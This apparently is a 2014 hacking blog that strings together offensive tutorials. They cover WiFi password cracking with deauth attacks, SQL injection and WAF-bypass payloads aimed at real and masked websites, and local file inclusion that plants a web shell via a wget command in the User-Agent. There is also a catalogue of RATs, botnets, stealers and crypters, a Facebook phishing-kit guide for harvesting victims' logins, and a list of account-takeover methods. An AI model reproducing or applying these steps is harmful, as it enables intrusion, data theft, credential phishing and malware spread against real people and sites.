Welcome Fellow Hacker!

Linggo, Mayo 4, 2014

How to Hack WPA/WPA2SK using FERN WIFI CRACKER

Automation Using the Fern WiFi Cracker

Just so you know, I still prefer and recommend you study the other methods to crack WEP as well, by using airodump, aireplay, and aircrack.
Why? Because in order to be a good network security professional, you need to KNOW how this stuff works. It’s not enough to be able to click a few buttons. We call those people keyboard jockies or tool monkeys.)  Understand what’s going on under the surface. WiFi hacking software  comes and goes, but aircrack, airodump, and aireplay have been around for a long time. They’re all quality products and you should know how each of these three tools works and how they can be used in conjunction with one another for a successful WiFi crack. The Fern WiFi cracker is an example of some fairly new WiFi hacking software that’s worth it.
Fern is a great WiFi cracker to use in a pinch and it’s already included in Back Track and Kali Linux. However, you can download Fern’s source code right here. We can use Fern to do a WiFi crack against a WEP encrypted network. Start by launching Fern from the Applications menu button at the top-left corner of the screen.
wifi hacking software  If you’re running Kali Linux:
-Select Applications -> Kali Linux -> Wireless Attacks -> Wireless Tools
If you’re running Back Track:
-Select Applications -> Back Track -> Exploitation Tools -> Wireless Exploitation Tools ->   WLAN Exploitation

Launch the Fern WiFi Cracker and Crack WEP

From the menu, click Fern-wifi-cracker to launch the tool.
crack wep










You should already have your wireless card in monitor mode. If not see my previous article right now.
crack wep

Click the drop down menu at the top of Fern and select your wireless adapter from this list. Click OK to any message boxes you get. After a few moments, the message Monitor Mode Enabled on… should appear in green as seen in the image.
Then click Scan for Access Points.
Fern will scan for WiFi networks in range, and will begin populating the WEP and WPA boxes.

cracking wep

Once the the Fern WiFi Cracker finishes scanning for networks, you can select the network you are targeting by finding it in either the  WEP section or the WPA section. In this example, I am targeting a WEP encrypted network with an SSID of Hack-WiFi.



wifi crack

You will have to select your target network from the drop down box and then clicking the WiFi Attack button to the right. 
hack wep







The Fern WiFi Cracker will now begin an automated WEP crack against the hack-wifi network. This may take some time, so if you need to get some coffee or take a dump, go for it. You’ll have a Please Wait… screen for a long time, as Fern goes through the process. Remember, Fern is completely automated WiFi hacking
wep cracker
software, so there isn’t anything left to do at this point than to just allow Fern to sniff the WiFi network, authenticate to the device, begin injecting replay traffic, and finally to crack WEP.
In my case, the Fern WiFi cracker didn’t succeed until it captured about 25,000 IVs.
But finally, if everything worked as it should, you’ll get the message below:
Congratulations! Another successful audit of a wireless network! As always, be sure to confirm you can connect to the target WiFi network.
wep broken
No comments

Hacking WPA/WPA2SK Wireless Network using COWPATTY

As part of my series on hacking Wi-Fi, I want to demonstrate another excellent piece of hacking software for cracking WPA2-PSK passwords. In my last post, we cracked WPA2 using aircrack-ng. In this tutorial, we'll use a piece of software developed by wireless security researcher Joshua Wright called cowpatty (often stylized as coWPAtty). This app simplifies and speeds up the dictionary/hybrid attack against WPA2 passwords, so let's get to it!

Step 1: Find the Cowpatty

Cowpatty is one of the hundreds of pieces of software that are included in the BackTrack suite of software. For some reason, it was not placed in the /pentest/wireless directory, but instead was left in the /usr/local/bin directory, so let's navigate there.
  • cd /usr/local/bin
Because cowpatty is in the /usr/local/bin directory and this directory should be in your PATH, we should be able to run it from any directory in BackTrack.

Step 2: Find the Cowpatty Help Screen

To get a brief rundown of the cowpatty options, simply type:
  • cowpatty
BackTrack will provide you a brief help screen. Take a note that cowpatty requires all of the following.
  • a word list
  • a file where the password hash has been captured
  • the SSID of the target AP

Step 3: Place the Wireless Adapter in Monitor Mode

Just as in cracking with aircrack-ng, we need to put the wireless adapter into monitor mode.
  • airmon-ng start wlan0

Step 4: Start a Capture File

Next, we need to start a capture file where the hashed password will be stored when we capture the 4-way handshake.
  • airodump-ng --bssid 00:25:9C:97:4F:48 -c 9 -w cowpatty mon0
This will start a dump on the selected AP (00:25:9C:97:4F:48), on the selected channel (-c 9) and save the the hash in a file named cowcrack.

Step 5: Capture the Handshake

Now when someone connects to the AP, we'll capture the hash and airdump-ng will show us it has been captured in the upper right-hand corner.

Step 6: Run the Cowpatty

Now that we have the hash of the password, we can use it with cowpatty and our wordlist to crack the hash.
  • cowpatty -f /pentest/passwords/wordlists/darkc0de.lst -r /root/cowcrack-01.cap -s Mandela2
As you can see in the screenshot above, cowpatty is generating a hash of every word on our wordlist with the SSID as a seed and comparing it to the captured hash. When the hashes match, it dsplays the password of the AP.

Step 7: Make Your Own Hash

Although running cowpatty can be rather simple, it can also be very slow. The password hash is hashed with SHA1 with a seed of the SSID. This means that the same password on different SSIDs will generate different hashes. This prevents us from simply using a rainbow table against all APs. Cowpatty must take the password list you provide and compute the hash with the SSID for each word. This is very CPU intensive and slow.
Cowpatty now supports using a pre-computed hash file rather than a plain-text word file, making the cracking of the WPA2-PSK password 1000x faster! Pre-computed hash files are available from the Church of WiFi, and these pre-computed hash files are generated using 172,000 dictionary file and the 1,000 most popular SSIDs. As useful as this is, if your SSID is not in that 1,000, the hash list really doesn't help us.
In that case, we need to generate our own hashes for our target SSID. We can do this by using an application called genpmk. We can generate our hash file for the "darkcode" wordlist for the SSID "Mandela2" by typing:
  • genpmk -f /pentest/passwords/wordlists/darkc0de.lst -d hashes -s Mandela2

Step 8: Using Our Hash

Once we have generated our hashes for the particular SSIDs, we can then crack the password with cowpatty by typing:
  • cowpatty -d hashfile -r dumpfile -s ssid
No comments

How to Crack WPA/WPA2PSK Wireless Connection using Aircrack

When Wi-Fi was first developed in the late 1990s, Wired Equivalent Privacy was created to give wireless communications confidentiality. WEP, as it became known, proved terribly flawed and easily cracked. You can read more about that in my beginner's guide to hacking Wi-Fi.
As a replacement, most wireless access points now use Wi-Fi Protected Access II with a pre-shared key for wireless security, known as WPA2-PSK. WPA2 uses a stronger encryption algorithm, AES, that's very difficult to crack—but not impossible. My beginner's Wi-Fi hacking guide also gives more information on this.
The weakness in the WPA2-PSK system is that the encrypted password is shared in what is known as the 4-way handshake. When a client authenticates to the access point (AP), the client and the AP go through a 4-step process to authenticate the user to the AP. If we can grab the password at that time, we can then attempt to crack it.
In this tutorial from our Wi-Fi Hacking series, we'll look at using aircrack-ng and a dictionary attack on the encrypted password after grabbing it in the 4-way handshake. If you're looking for a faster way, I suggest you also check out my article on hacking WPA2-PSK passwords using coWPAtty.

Step 1: Put Wi-Fi Adapter in Monitor Mode with Airmon-Ng

Let's start by putting our wireless adapter in monitor mode. For info on what kind of wireless adapter you should have, check out this guide. This is similar to putting a wired adapter into promiscuous mode. It allows us to see all of the wireless traffic that passes by us in the air. Let's open a terminal and type:
  • airmon-ng start wlan0
Note that airmon-ng has renamed your wlan0 adapter to mon0.

Step 2: Capture Traffic with Airodump-Ng

Now that our wireless adapter is in monitor mode, we have the capability to see all the wireless traffic that passes by in the air. We can grab that traffic by simply using the airodump-ng command.
This command grabs all the traffic that your wireless adapter can see and displays critical information about it, including the BSSID (the MAC address of the AP), power, number of beacon frames, number of data frames, channel, speed, encryption (if any), and finally, the ESSID (what most of us refer to as the SSID). Let's do this by typing:
  • airodump-ng mon0
Note all of the visible APs are listed in the upper part of the screen and the clients are listed in the lower part of the screen.

Step 3: Focus Airodump-Ng on One AP on One Channel

Our next step is to focus our efforts on one AP, on one channel, and capture critical data from it. We need the BSSID and channel to do this. Let's open another terminal and type:
  • airodump-ng --bssid 08:86:30:74:22:76 -c 6 --write WPAcrack mon0
  • 08:86:30:74:22:76 is the BSSID of the AP
  • -c 6 is the channel the AP is operating on
  • WPAcrack is the file you want to write to
  • mon0 is the monitoring wireless adapter*
As you can see in the screenshot above, we're now focusing on capturing data from one AP with a ESSID of Belkin276 on channel 6. The Belkin276 is probably a default SSID, which are prime targets for wireless hacking as the users that leave the default ESSID usually don't spend much effort securing their AP.

Step 4: Aireplay-Ng Deauth

In order to capture the encrypted password, we need to have the client authenticate against the AP. If they're already authenticated, we can de-authenticate them (kick them off) and their system will automatically re-authenticate, whereby we can grab their encrypted password in the process. Let's open another terminal and type:
  • aireplay-ng --deauth 100 -a 08:86:30:74:22:76 mon0
  • 100 is the number of de-authenticate frames you want to send
  • 08:86:30:74:22:76 is the BSSID of the AP
  • mon0 is the monitoring wireless adapter

Step 5: Capture the Handshake

In the previous step, we bounced the user off their own AP, and now when they re-authenticate, airodump-ng will attempt to grab their password in the new 4-way handshake. Let's go back to our airodump-ng terminal and check to see whether or not we've been successful.
Notice in the top line to the far right, airodump-ng says "WPA handshake." This is the way it tells us we were successful in grabbing the encrypted password! That is the first step to success!

Step 6: Let's Aircrack-Ng That Password!

Now that we have the encrypted password in our file WPAcrack, we can run that file against aircrack-ng using a password file of our choice. Remember that this type of attack is only as good as your password file. I'll be using the default password list included with aircrack-ng on BackTrack named darkcOde.
We'll now attempt to crack the password by opening another terminal and typing:
  • aircrack-ng WPAcrack-01.cap -w /pentest/passwords/wordlists/darkc0de
  • WPAcrack-01.cap is the name of the file we wrote to in the airodump-ng command
  • /pentest/passwords/wordlist/darkc0de is the absolute path to your password file

How Long Will It Take?

This process can be relatively slow and tedious. Depending upon the length of your password list, you could be waiting a few minutes to a few days. On my dual core 2.8 gig Intel processor, it's capable of testing a little over 500 passwords per second. That works out to about 1.8 million passwords per hour. Your results will vary.
When the password is found, it'll appear on your screen. Remember, the password file is critical. Try the default password file first and if it's not successful, advance to a larger, more complete password file such as one of these.

Stay Tuned for More Wireless Hacking Guides

Keep coming back, as I promise more advanced methods of hacking wireless in future tutorials. If you haven't seen the other Wi-Fi hacking guides yet, check them out here. Particularly the one on hacking WEP using aircrack-ng and hacking WPA2-PSK passwords using coWPAtty.
And as always, if you have questions on any of this, please ask away in the comments below.
No comments

XFS Tutorial (CROSSFRAMESCRIPTING)



XFS - Cross Frame Scripting

Definition:

The frame which is vulnerable to Hackers to edit Source hence to Destroy it Structure partially or fully .

Types of XFS :


  • temporary
  • permanent ( rare )

temporary

in this type of vulnerable the user can only take control over only his side with a normal redirect ( works only for tester ) (the url remains same )

Permanent :

in this type the vulnerable will come via url and it is visible in every part of world until unless the vulnerable is fixed .



Finding vulnerable :

the vulnerable revolves around the site with many Iframe's . So you need choose the website wisely . do not choose if Iframe's is coded in complete pure html . every thing else works !

Things needed :

1)Firefox

FireFox is the best browser for hacker .

2) Tamper Data Addon

A addon for firefox which Catches GET's And POST's which are most important in XFS .

3) A brain

Huh > you have it right ?

4) Cookie Manager/Editor Addon

exploiting :
the Formula Must should be :

home page --> sub link --> iframe

Lets take a Example as " chrome download page " ( just a Example no XFS exists )

i.e :

PHP Code:
https://www.google.com/intl/en/chrome/browser/ 

Open up Tamper data In Firefox :

After that , Now Click Start tamper !

Click the sub link which will Direct you to a direct IFrame .

Take a note Pad And write Down all the Commands listed in tamper data

i.e Example :
PHP Code:
12x GET's

5x POST'

now make sure it has 1-5 POST's and reaming are all GET's

Now , Go back from browser And click again now make Sure you leave All the GET's And when Ever you got a POST Command edit all the fields to
PHP Code:
XFS 

Now you need to do minor Editing in the url to check its weather XFS or not .

lets try it out :

PHP Code:
x.com/thread-01/view;POST1
Result
:Same as Original

x
.com/thread-01/view;POST2
Result
Same as Original
x
.com/thread-01/view;POST3
Result
Same as Original

x
.com/thread-01/view;POST4
Result
Same as Original

x
.com/thread-01/view;POST5
Result
Broken I Frame we got it !!) 

Viola! we got it .

Now edit the cookie of that page with cookie Manager ! Set it to "
POST5 "

Now reload page and see the result is same or not .

its same We got it right !

Now If you want to Redirect use as follows code

PHP Code:
x.com/thread-01/view;POST5;redir.php?=www.google.com 

And if you want to popup use this code

PHP Code:
x.com/thread-01/view;POST5;alert("XFS")
No comments

Using and Creating SQL DORKS

A method of finding websites vulnerable to SQL injection is using what we call "dorks"
Dorks:They are like search criteria in which a search engine returns results related to your dork.
The process can be a little time consuming, but the outcome will be worth it after learning on how to use dorks


For this tutorial, the search engine we'll be using is Google
Credits to those who are mentioned in this tutorial
Now I'll show you how to use dorks with the help of a video too.




Step1: Finding your dorks i.e. the criteria you'll be using
Dork List compiled by kobez-
Code:
http://pastebin.com/0FqmasC7

Dork List by Sidesipe-
Code:
http://pastebin.com/x1rtqktj

Dork List by .Newsletter'
Code:
http://pastebin.com/APxqavu9

For this tutorial, we'll be using this dork "inurl:index.php?id="


Step2: Making use of your Dorks with the help of Google

Here's what you do:
  • Go to http://www.google.com
  • Type the dork in the search bar "inurl:index.php?id=" (with or without quotes)
  • Now you'll find a whole lot of links in your results

Here's how you can speed up your process:
In your mouse, there should be a scroll button right?
Hover your mouse on each link and hit the scroll button so that it'll open on a new tab. (Lets say you can open about 10 links at a time)


Step3: Vulnerability approach

Now to see whether the website is vulnerable to SQL injection or not, we simply put in a quote " ' " at the end of the url address.
So our site will look like this
Code:
http://www.site.com/index.php?id=123'

Do the same thing with the websites you opened on your tabs and see if there's any vulnerable website.

To determine if a website is vulnerable or not, it should return an error!

Note: If you can't find any vulnerability after doing some vulnerability search on this dork, you can always browse the dork list I've mentioned above and use any of them until you find any website vulnerable to SQL injection
No comments

Hack Website using Blind SQL INJECTION



S0.6 - Blind SQL Injection


Let me start of by saying, blind SQL injection is very time consuming. I honestly don't think anyone would judge you if you used a tool while injecting a site using the blind method. Lets get started anyway. I found a site which I could use union based injection on so I wouldn't have to guess the table names, which made this tutorial alot easier to write.

First of all we will want to find a site using dorks, mentioned erlier in this tutorial. If order by/group by isn't working for you, you could try blind (or error based, i'll make a tutorial for that soon).
When we have our site, with a vulnerable parameter, you will want to test if it is vulnerable. We can do this by adding "and 1=1" onto the end of our url, and if it loads normally then thats good. Now if we add "and 1=2" and get an error, or the page doesn't load normally, it's most likely vulnerable.


Code:
http://www.giacusa.com/news.php?newsid=126 and 1=1
< no error
Code:
http://www.giacusa.com/news.php?newsid=126 and 1=2
< doesn't load properly

It does this because you're either providing a true or false statement. 1=1 is true. 1=2 is false. This is the method we will be using to gather information.
To find the version we will want to use

Code:
and substring(@@version,1,1)=VERSIONHERE

Where we have "VERSIONHERE", you will want to put the version there. Most sites would either use 4 or 5. Using what i said erlier, if the version is false, it won't load correctly. If it is true, it will.

Code:
http://www.giacusa.com/news.php?newsid=126 and substring(@@version,1,1)=4
< doesn't load properly
Code:
http://www.giacusa.com/news.php?newsid=126 and substring(@@version,1,1)=5
< loads fine

So we have established that the version is 5. We will use this method of guessing to find out pretty much all the info as we would in a union based injection.
Now to find the tables we will have to guess the names. Since union based injection works on the site I'm using as an example as, I just quickly got the tables/columns doing it that way to make the tutorial simple. But otherwise you would have to guess it. You could use common table names such as admin, user, login etc. We will use " (SELECT 1 from TABLE limit 0,1)=1 ".

Code:
http://www.giacusa.com/news.php?newsid=126  and (SELECT 1 from test limit 0,1)=1
< page doesn't load correctly.
Code:
http://www.giacusa.com/news.php?newsid=126  and (SELECT 1 from test2 limit 0,1)=1
< page doesn't load correctly.
Code:
http://www.giacusa.com/news.php?newsid=126  and (SELECT 1 from chapters limit 0,1)=1
< page loads fine. so there is a table named chapters.

Now to find the columns from a table, we will have to use the same method. We will use " (SELECT substring(concat(1,COLUMNNAME),1,1) from TABLENAME limit 0,1)=1 ". So,

Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,test1),1,1) from chapters limit 0,1)=1
< doesn't load properly
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,test2),1,1) from chapters limit 0,1)=1
< doesn't load properly
Code:
http://www.giacusa.com/news.php?newsid=126 and (SELECT substring(concat(1,category),1,1) from chapters limit 0,1)=1
< loads fine. There is a column named category.

After you have done that, here comes the really time consuming part. We will have to guess each letter of the data value, one by one in ascii. So "test" = "74 65 73 74". You can find an ascii chart here - http://www.asciitable.com/. Or you can use the text > hex feature in the hackbar addon for firefox. Or use this - http://easycalculation.com/ascii-hex.php.

We will want to use -
Code:
ascii(substring((SELECT concat(COLUMN) from TABLE),CHARACTER NUMBER,1))>ASCII VALUE HERE

It didn't work on my site for some reason, but I'll explain it anyway. Say user = john.

Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>64
should load normally. because most sited wouldn't allow "@" in the username, but it's possible. @ = 64 in ascii. Since it loads normally you know it is greater than 64.

Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>105
will load normally, because the "j" in john = 106 in ascii.
Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>106
will return an error, because "j" is not greater than 106. It is 106. It's like finding columns really. So after we know it is 106 in ascii, we write that down. 106 = j.

Now we will need to find the other letters, so we will change "1,1" to "2,1" which will move one character along.

Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),2,1))>110
will load normally, because the "o" in john is greater than 110. It's 111. So

Code:
and ascii(substring((SELECT concat(user) from users WHERE id=1),1,1))>111
will return an error because o is equal to 111, not greater. But since you get nothing at 110, you know it's 111. So now you have the first two characters, just keep repeating this untill you get an error no matter what, then you will know that you have the full username. Then after you have done that move to a different column, such as password :). Like I said this can be really time consuming, this is probabally one of the only times I'd use a tool personally.





Resources.

http://hashchecker.de/find.html - Sends the query to a number of MD5 checking sites, saves alot of time.
http://timwarriner.com/software/md5brute.html - MD5 Bruteforcer.
http://itsecteam.com/en/projects/project1_page2.htm - If you're a skid and can't be bothered following a simple tutorial, this is for you.
http://th3-0utl4ws.com/tools/admin-finder/ - Online admin finder.
http://pastebin.com/wsfBfegb - Admin Finder, scripted in perl. By GlaDiaT0R. Supports PHP/CFM/HTML/ASP
http://www.string-functions.com/string-hex.aspx - String to hexdecimal converter.
No comments

Hack Website using SQL INJECTION WAF BYPAS

Ok lets get started.

You have found your SQLi vulnerable site, you found how many columns it has (in this case 62 xD)

You do the regular command:



Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ​ ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 ​7,58,59,60,61,62--

The website returns this error message:

[Image: tutorialmessage.jpg]

What you would like to do now is you use inline comments to comment out the blocked commands, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ​ ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 ​7,58,59,60,61,62--

And now the website returns this:

[Image: tutorialnumbers.jpg]

Ok now we will try to add version(),database() and user() in one line like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,concat('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5 ​ ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ​ ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 ​0,61,62--

The website returns this:

[Image: tutorialmessage.jpg]

We would now like to make "concat" both upper and lower case letters, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,CoNcAt('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5 ​ ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ​ ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 ​0,61,62--

The website returns;

[Image: tutorialversion.jpg]

Now for the good part; lets try to find all the databases, here is the regular syntax:

Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ​ ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4 ​9,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.schemata--

But with our new techniques the syntax would look like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,GrOuP_CoNcAt(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ​ ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4 ​9,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.schemata--

The website returns:

[Image: tutorialdbs.jpg]

now we would like to get the tables:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, ​ 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ​,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.tables where table_schema=database()--

The website returns:

[Image: tutorialmessage.jpg]

Now you have to in some way comment out information_schema or tables, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, ​ 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ​,50,51,52,53,54,55,56,57,58,59,60,61,62 from /*!information_schema*/.tables where table_schema=database()--

and this returns:

[Image: tutorialtables.jpg]

it's the same to get columns, you know the drill.

If you now want to dump columns id from admin table you do like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(id),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ​ ,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,5 ​2,53,54,55,56,57,58,59,60,61,62 from admin--

Hope you learned something from my tutorial, feel free to ask if you have any questions.

REMEMBER; This is only BASIC WAF bypass, the techniques are endless
No comments

Local File Intrusion and WAF BYPASSING

Local File Inclusion

Requirments

First of all, check if the site got a vulnerabillity against

Quote:etc/passwd
To do that.
Quote:http://www.site.com/index.php?filename=2
Change the number '2' to
Quote:etc/passwd
and it will look like this:
Quote:http://www.site.com/index.php?filename=etc/passwd
If it works, it will pop up some type of a code.

It will look like this

Do the same but change to 'Etc/passwd' to
Quote:/proc/self/environ

If it works and the file exist, you'll get something similar but not the same code.

Let's open temper data. To do that press F10 and do as I did here.
[Image: 3cc30c8dcfa268c457726ec0ec417f93.png]

Now when you have temper data up, it would look similar to this.

Click the button 'Start temper' In the top left corner.
[Image: 853ba2956894a57438d3b8c1dffe0698.png]

When the Tamper is done, you would see a window like this.
[Image: 76fce75d5c9b019cab1f21f7f7993bba.png]

Change your 'User-Agent' to
Quote:<?php phpinfo();?>
Now refresh your site.

And this is how it would look like.

Now let us upload out shell.

Start up the Tamper-Data, then click star tamper and go to the 'User-Agent' again.

Type this into the 'User agent field'
Quote:<?exec('wget http://www.site.com/shell.txt -O shell.php');?>

The site will now download your shell. You can locate the shell at website/shell.php
or
http://www.site.com/index.php?filename=shell.php

And you would locate your uploaded shell.

.


WAF aka Web Application Firewalls.

Today, I'll show you how to bypass a Web applications firewall.

First of all, check if the site got a vulnerabillity against LFI.
In order to do that, change your old vector /etc/passwd to %2fetc%2fpasswd.
Your whole URL aka 'Uniform Resource Locator' would look like this.
Quote:BeggfomercyIsanoob.com/index.php?filename=%2fetc%2fpasswd.

So basicly every '/' will be changed to'%2f' without quotes.
(/=%2f) That's a pretty eazy form to remember, keep that in mind.

This method is called 'URL Encoding.', It can be some kind of algorithm.
As the name says, it will encode the URL and bypass the filters if you got the luck with you.

To bypass the characther limit, you can just do it like this.
Quote:/../etc/passwd/./././././././././././././././././././././././././././././
Much more, It depends on the web server.

Null Bytes, this method is pretty eazy and can be really usefull.
Add this to the end of your URL.
Quote:

For exemple.
Quote:  .com/index.php?filename=/etc/passwd.
You can even add nullbytes instead. This will help you to get around the firewalls, but does'nt always work.

This is just a few methods, it exist so much more. I might cover that in another tutorial.

This does not cover everything, It's just the basics within WAF bypassing, It might of been an error in the tutorial
If so please report it to me.
No comments

Rats,Botnets,Stealers All Programs for Hacking


I will not post any cracked version of any rat

I will update this post when new versions come

All files posted here are CLEAN analyzed by me. If you think any file is infected just don't download it, and don't post shit. ALL files are detected by avs, MALWARE always is detected by avs.

Tools marked with [C] you can find free using Google.

If you report any infected file, POST ANY PROOF or you get -rep

If you want your FREE or PAID rat/botnet/crypter/stealer/keylogger/bitcoin miner/ or any malware related posted here, just pm me with your thread link.


Remote Administration Tools - ( RATS )

- Cybergate 1.07.5 - [Image]

- DarkComet 5.3.1.F - [Image]

- Xtreme Rat 2.9 - [Image]

- Pytho Rat 1.5 - [Image]

- nj Rat 0.4.1 - [Image]

- Grimm Rat 1.3 Beta

- Spy-Net 2.6 - [Image]

- Bifrost 1.2.1 d - [Image]

- CyberEye 1.2 - [Image]

- Poison Ivy 2.3.2 - [Image]

- Schwarze Sonne Rat 2.0 Beta 2 - [Image]

- Turkojan 4.0 - [Image]

- Frutas 0.8 ( Java ) - [Image]

- RoyalNET RAT v1.3 - [Image]

- Bozok 1.1 - [Image]

- Adsocks 1.0 Beta ( Java ) - [Image]

- Greame Rat 1.5 Final

- NovaLite 3.0 - [Image]

- jRat 3 ( Java ) - [Image]

- Lost Door v8.0 Pure - [Image]

- Daleth RAT 1.0 - [Image]

- Coolvibes RAT - [Image] - [Pass: Coolvibes]

- DNA Rat - [Image]

- Cerberus 1.03.5 beta - [Image]

- R.A.I.D. - [Image]

- bRAT - Batch RAT

Remote Administration Tools - ( RATS ) - Paid

- Blackshades - BACKDOORED. [C]

- Cybergate Rat - [Image] [C]

- ClientMesh RAT - [Image]

- Emissary Rat

- NetWire RAT - [Image]

- BlackNix RAT - [Image]

- legacyLink - [Image]

HTTP Botnets

- Umbra Loader 1.1.1 - [Image]

- Umbra Loader 1.2.0 (Version by Hermalit) - [Image]

- VertexNet 1.2.1 - [Image]

- µBOT - [Image]

- Elite Loader - [Image]

- Exodus Loader

HTTP Botnets - Paid

- Andromeda - [Image] [C]

- Smoke Loader - [Image] [C]

- Betabot - [Image]

IRC Botnets

- AryaN Builder

IRC Botnets - PAID

Athena IRC

Password Stealers

- ISR Stealer 0.4.1 - [Image]

- Crime24.NET

- aStealer - [Image]

- iStealer 6.3 Legends ( Outdated ) - [Image]

Keyloggers

- Project Neptune 2.0 - [Image]

- Lion Keylogger V1 - [Image]

- HB 1.2.1 Beta

Crypters - Paid

- RazorCrypt2 - [Image] - [AutoIT] [Start at $20]

- Debug Crypter v3 - [Image] - [.NET] [Start at $25]

- Byte Crypter V8 - [Image] - [.NET] [Start at $36]

- Infinity Crypter v4 - [Image] - [.NET] [Start at $20]

- FLUX CRYPTER - [Image] - [.NET] [Start at $15]

- X-Core Crypter - [Image] - [AutoIt] [Start at $20]

- Soft Crypter - [Image] - [.NET] [Start at $50]
No comments

Hack Facebook using Phishing Technique

MAKING FACEBOOK PHISHING SITE TUTORIAL.

Phishing is the act of attempting to acquire information such as usernames and passwords. phishing directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to deceive users,and exploits the poor usability of current web security technologies. 


Tutorial:
            Hi Friends I'm again in front of you with easy & complete phishing tutorial, many times phising tricks posted here but almost user says they can't understand so now you can make your phising page eaisly step by step: .This have a great advantage it's a latest FB phising page made by me, reply here if you face any problem Download This Phising Script 
                                               Download


than go to 000webhost.com 
 and choose free account option
now you click on free domain

              In registration choose pass with combination of capital , small alphabets & numbers.
              after registration verify your account by email.

Now you can see your control panel (refesh page if required), goto control panel

you can see a page for upload your file (Don't upload file here , it's must be upload on public directry according to below image)

Upload your facebook page in .zip format

now you can see your file below like this

Thats all... 
 Now Your Phishing fb page is  YourDomain.com/index.html 
index.html is your phishing page.

 Now you can send this page to your victimes, When your Victime login this fake page their login and pass store in your hosting directry  lol.txt  like below





Note: This default fb phising page redirect on www.google.com
 you can cange by editing hello.php in download fb phishing.zip pack

..This tutorial only for educational purpose for prevent you from hackers, applying this technique may be considerd as crime..

No comments

Top Ways to Hack Facebook Accounts



Top 8 Ways To Hack Facebook Accounts 

There are various methods to hack facbook account password like Keyloggers, Phishing websites etc.. whereas bruteforcing, dictionary attacks, DDOS attack etc will not work directly due account lockout feature. Today in this post I am going to share a very effective way to hack facebook account I named it Top 10 ways to hack facebook accounts



8 Way To Hack Facebook 

1. Facebook Phishing 




Phishing still is the most popular attack vector used for hacking facebook accounts, There are variety of methods to carry out phishing attack, In a simple phishing attacks a hacker creates a fake login page which exactly looks like the real facebook page and then asks the victim to login into that page, Once the victim logins through the fake page the victims "Email Address" and "Password" is stored in to a text file, The hacker then downloads the text file and get's his hands on the victims credentials.
I have explained the step by step phishing process in my post below:
                     

2. Keylogging 

Keylogging, according to me is the easiest way to hack a facebook password, Keylogging sometimes can be so dangerous that even a person with good knowledge of computers can fall for it. A keylogger is basically a small program which once is installed on victims computer will record every thing which victim types on his/her computer. The logs are then send back to the attacker by either FTP or directly to hackers email address. 

I have explained the step by step process in my post 

How To Hack Facebook With keylogging

3. Session Hijacking




Session Hijacking can be often very dangerous if you are accessing Facebook on a http:// connection, In a Session Hijacking attack a hacker steals the victims browser cookie which is used to authenticate a user on a website and uses to it to access victims account, Session hijacking is widely used on Lan's. I have already written a three part series on How session hijacking works? and also a separate post on Facebook session hijacking.


4. Sidejacking With Firesheep


Sidejacking attack went common in late 2010, however it's still popular now a days, Firesheep is widely used to carry out sidejacking attacks, Firesheep only works when the attacker and victim is on the same wifi network. A sidejacking attack is basically another name for http session hijacking, but it's more targeted towards wifi users.
To know more about sidejacking attack and firesheep, read the post mentioned below:



5. Mobile Phone Hacking
Millions of Facebook users access Facebook through their mobile phones. In case the hacker can gain access to the victims mobile phone then he can probably gain access to his/her Facebook account. Their are lots of Mobile Spying softwares used to monitor a Cellphone.
The most popular Mobile Phone Spying softwares are:
